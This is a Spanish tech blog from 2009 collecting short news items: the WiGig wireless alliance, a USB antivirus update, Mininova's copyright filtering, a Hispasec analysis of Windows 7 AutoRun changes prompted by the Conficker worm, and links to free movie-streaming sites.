Broadcom, Intel, LG, Microsoft, Nokia, Panasonic y Samsung pretenden acelerar el desarrollo de Gigabit (WiGig), que será el sustituto natural del WiFi actual, que permita la trasmisión de vídeo de alta definición (HD).

WiGig será entre 10 y 20 veces más rápido que el WiFi, alcanzando velocidades de hasta 1 Gbps, empleando un espectro de 60 GHz.

"Estamos en el punto en que ya ha caído la última barrera de la tecnología de transmisión inalámbrica para llegar a ser tan potente como las conexiones por cable", según Craig Mathias, de Farpoint Group.

"La Alianza WiGig desarrollará una tecnología que tendrá un enorme impacto en la conectividad y la movilidad, en la tecnología de la información, la electrónica de todos los días y muchas otras aplicaciones", añadió.

La alianza pretende tener listo el nuevo estándar antes de que finalice el año, para posteriormente comenzar con las pruebas de fiabilidad.

Via Hispamp3

jueves, 7 de mayo de 2009

MXOne Antivirus para tu memoria USB, CELULAR, CAMARA u otro que se le parezca



Hola, que tal? Nuevamente con noticias, esta vez les presento una actualización del antivirus para memorias USB MXONE.

Recomendado.

Descargar



Mininova comienza a filtrar torrents


Mininova, uno de los más populares trackers de torrent del mundo está comenzando a filtrar los contenidos que ofrece.

Tan sólo unos días antes de su comparecencia en la corte, Mininova está usando un sistema de reconocimiento de contenidos destinado a detectar y eliminar los archivos torrent que enlazan con contenidos que vulneran los derechos de autor.

Tras el caso PirateBay y sin duda presionado por las entidades de gestión de derechos de autor, Mininova ha comenzado a colaborar con ellas filtrando los contenidos que ofrece.

Uno de los fundadores de Mininova ha declarado a TorrentFreak que han implementado un sistema de detección de ficheros con copyright que actualmente están probando con diversos títulos y durante un período de 12 semanas.

El sistema de filtrado está actualmente siendo operado por una entidad de gestión cuyo nombre no ha sido publicado.

Via HispaMP3



lunes, 4 de mayo de 2009

Microsoft mejora la "autoejecución" de Windows 7. ¿Gracias, Conficker?

Microsoft ha decidido mejorar la seguridad de la funcionalidad de "autoejecución" de los medios extraíbles en los que se pueda escribir. Lo hará en Windows 7 y anteriores (a través de actualización se supone). Un nuevo paso en la dirección correcta, pero como siempre, demasiado tarde. ¿Nadie aprende de las lecciones pasadas? Ha tenido que ocurrir un desastre como el Conficker para que Microsoft reaccione. No es la primera vez que un golpe vírico acelera el proceso de fortificación de Windows.

Por fin. A pesar de que no era muy complicado adivinar que la popularidad de las memorias USB en combinación con la autoejecución de Windows traería problemas, esta venía activada por defecto. Los creadores de malware se han venido aprovechando de esta circunstancia desde hace varios años. El uso cada vez mayor de memorias USB no ha hecho más que agravar la situación, transportándonos a tiempos pasados, en los que el disquete era el medio de propagación natural para los virus.

Ahora Windows 7 mejora esta funcionalidad, evitando el diálogo de ejecución automática en memorias USB. Esto no es una desactivación total. Para los dispositivos que en los que se supone no se puede escribir (medios ópticos), seguirá preguntando qué hacer y entre esas opciones permitirá la ejecución automática. Los atacantes encontrarán una forma de aprovechar esto (por ejemplo a través de memorias USB que montan automáticamente una unidad óptica virtual...), pero al menos se da un paso en la dirección correcta.

¿Por qué ahora?

La respuesta corta es Conficker. A pesar de que se sigue diciendo en los medios que el método preferido de este gusano es aprovechar una vulnerabilidad en el servicio RPC de Windows parcheada a finales de 2008, no es del todo cierto. Conficker ha aprovechado como nadie el autorun.inf de Windows, poniendo en jaque a Microsoft y a las casas antivirus. Encontró la forma de ofuscar el contenido de manera que pasara desapercibido para los motores antivirus. También consiguió saltarse la protección del autorun propia de Microsoft, por lo que tuvieron que corregir el fallo a través de un parche porque la medida no se mostraba demasiado efectiva. Conficker además consiguió engañar a muchos usuarios modificando el diálogo de autoplay que muestra el autorun: parecía que ibas a explorar la carpeta cuando en realidad ejecutabas el archivo... ingeniería social bastante sofisticada. Esto es, principalmente, lo que se ha buscado evitar con el cambio introducido en Windows 7.

Aunque el autorun está siendo aprovechado por una buena cantidad de malware desde hace años, desde finales de 2008 Conficker ha conseguido, como ningún otro, encontrar todos los puntos débiles de la funcionalidad y explotarlos con éxito.

También ha influido el hecho de que en los reportes de Microsoft se han materializado, en los últimos meses, escalofriantes cifras sobre malware que a su vez ha aprendido de Conficker y ha potenciado este vector de ataque.

La misma piedra, la misma reacción

A finales de 2001, cuando apareció el sistema operativo XP, Microsoft introdujo de serie una estupenda funcionalidad que cada vez se mostraba más necesaria en aquellos momentos: un cortafuegos. Lo traía deshabilitado por defecto. Es cierto que hubiese resultado un cambio demasiado drástico teniendo en cuenta que se venía de un "sistema operativo" como Windows 98.

Con el Service Pack 2 en verano de 2004, Windows activó el cortafuegos por defecto. Entonces, los culpables fueron en buena parte otros gusanos: Blaster y Sasser. El verano anterior (2003) causaron una terrible epidemia. Blaster fue "culpable" de muchas otras mejoras de seguridad, pero la más clara fue la activación del cortafuegos, que hubiera evitado buena parte del problema que el propio Blaster causó. Y la medida fue efectiva. De un plumazo desaparecieron la mayoría de los gusanos de propagación masiva que accedían a los servicios que escuchaban en los puertos de Windows. La respuesta de los creadores de malware fue el uso de conexiones inversas (que van desde el sistema infectado hacia servidores nodriza) eludiendo así la protección de un cortafuegos entrante. Windows Vista incluye un cortafuegos para las conexiones salientes que podría mitigar un poco el problema pero una vez más, viene desactivado por defecto.

Es una pena que Microsoft no se anticipe a estas catástrofes (en ocasiones previsibles), y suela reaccionar con posterioridad, a base de golpes, cuando el daño ya está hecho. La parte positiva, es que poco a poco, las malas costumbres heredadas de sus "sistemas operativos" excesivamente permisivos y de una Internet mucho menos agresiva, se van corrigiendo.


AutoRun changes in Windows 7
http://blogs.technet.com/srd/archive/2009/04/28/autorun-changes-in-windows-7.aspx

Via Hispasec

domingo, 3 de mayo de 2009

Ver películas online gratis


Hola a todos nuevamente, esta vez aprovecho la ocasión para compartir con todos ustedes una web para ver películas completas en internet gratis y subtituladas al español.

Pueden usar algún programa para bajarlas directamente, en mi caso tengo instalado
real player que incorpora una herramienta que permite bajar las películas directamente.


Una de las que más me ha gustado es delatv y su dirección es: http://delatv.com

La web para ver las películas es peliculasid : http://www.peliculasid.com/

saludos

Etiquetas

INTERNET (459) newsweek (305) SEGURIDAD (224) software (136) HACK (86) GOOGLE (47) Hacker (46) Geek (41) hardware (36) WINDOWS (34) Hackers (31) CRACK (29) facebook (29) video (28) DESCARGA (27) videos (26) Celulares (25) MICROSOFT (22) Informatica (21) apple (19) GRATIS (18) technology (18) virus (18) exploit (17) computación (16) informatico (16) web (15) cracker (14) INALAMBRICO (13) WINDOWS 7 (13) noticias (11) MSN (10) termino (10) ACTUALIZACION (9) Gamer (9) LapTops (9) Mac (9) PASSWORD (9) WINDOWS XP (9) dns (9) firefox (9) juegos (9) FOTOS (8) cientifico (8) iphone (8) WEP (7) antivirus (7) bibliografia (7) Desencriptar (6) INFINITUM (6) wifi (6) youtube (6) Craker (5) Culiacan (5) DESMOSTRACION (5) TELEFONIA (5) gmail (5) messenger (5) DIRECTA (4) DOWNLOAD (4) ESPAÑOL (4) XBOX (4) xss (4) Glosario (3) HTML (3) WPA (3) anuncios (3) ataques (3) hosting (3) hotmail (3) Guru (2) ajax (2) wpa2 (2)